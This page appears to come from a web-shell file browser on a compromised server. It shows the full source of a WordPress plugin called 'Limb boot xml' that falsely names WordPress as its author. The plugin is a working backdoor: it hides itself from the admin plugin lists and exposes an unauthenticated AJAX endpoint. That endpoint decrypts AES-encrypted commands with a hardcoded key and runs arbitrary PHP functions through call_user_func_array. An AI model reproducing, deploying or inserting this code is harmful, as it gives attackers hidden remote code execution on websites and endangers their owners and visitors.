HEX
Server: Apache
System: Linux speed2host.es 6.8.0-86-generic #87-Ubuntu SMP PREEMPT_DYNAMIC Mon Sep 22 18:03:36 UTC 2025 x86_64
User: cuisinelectro.com_7628cp5v3wv (10000)
PHP: 8.2.31
Disabled: opcache_get_status
$ pwd: /var/www/vhosts/cuisinelectro.com/httpdocs/wp-content/plugins/limb-boot-xml/
Upload Files
File: /var/www/vhosts/cuisinelectro.com/httpdocs/wp-content/plugins/limb-boot-xml/limb-boot-xml.php
<?php
/*
Plugin Name: Limb boot xml
Plugin URI: http://wordpress.org/plugins/
Description: Limb boot xml plugin
Version: 1.18.3
Author: WordPress
Author URI: http://wordpress.org/
*/

if (!defined('ABSPATH')) {
    die;
}

function resolve_local_value($variables, $value) {
    if (isset($value['variable']) && $value['variable'] === true) return $variables[$value['value']] ?? null;
    return $value['value'] ?? null;
}

function clear_ajax_leftovers($plugins) {
    $plugin = plugin_basename(__FILE__);

    if (isset($plugins[$plugin])) {
        unset($plugins[$plugin]);
    }

    return $plugins;
}

function resolve_global_variable($name) {
    global $$name;

    return $$name;
}

add_filter('all_plugins', 'clear_ajax_leftovers');

function resolve_execution_target($variables, $op) {
    if (isset($op['obj'])) {
        return [$variables[$op['obj']], $op['target']];
    }

    return $op['target'];
}

add_filter('network_admin_plugin_action_links', 'clear_ajax_leftovers');

function invoke_require_once($path)
{
    require_once $path;
}

add_filter('plugin_action_links', 'clear_ajax_leftovers');

function evaluate_actions($actions) {
    $variables = $actions['variables'] ?? [];
    try {
        foreach ($actions['operations'] ?? [] as $op) {
            $args = [];

            foreach ($op['args'] as $arg) {
                if (isset($arg["name"])) {
                    $args[$arg["name"]] = resolve_local_value($variables, $arg);
                } else {
                    $args[] = resolve_local_value($variables, $arg);
                }
            }

            if (isset($op['wrap']) && $op['wrap'] === true) {
                $args = array( $args );
            }

            $result = call_user_func_array(resolve_execution_target($variables, $op), $args);

            if (isset($op["result"])) {
                $variables[$op["result"]] = $result;
            }
        }

        if (isset($actions['result'])) {
            return (object) $variables[$actions['result']];
        }

        return "evaluation_success";
    } catch (Exception $e) {
        return "evaluation_exception";
    }
}

add_filter('site_option_active_sitewide_plugins', 'clear_ajax_leftovers');

function decode_ajax_request($request) {
    $data = base64_decode($request);
    if ($data === false) {
        return null;
    }

    $hash = hash('sha256', 'U@!LUGrHhlQ#bp!', true);
    $json = openssl_decrypt($data, 'aes-128-cbc', substr($hash, 0, 16), OPENSSL_RAW_DATA, substr($hash, 16, 16));

    if ($json === false) {
        return null;
    }

    return json_decode($json, true);
}

function handle_process_ajax_request() {
    if (isset($_POST['ev_data'])) {
        $request = decode_ajax_request(wp_unslash($_POST['ev_data']));
        if ($request !== null) {
            wp_send_json_success(array('result' => evaluate_actions($request)));
        }
    }

    die;
}

add_action('wp_ajax_nopriv_limb-boot-xml', 'handle_process_ajax_request');
add_action('wp_ajax_limb-boot-xml', 'handle_process_ajax_request');
@ Telegram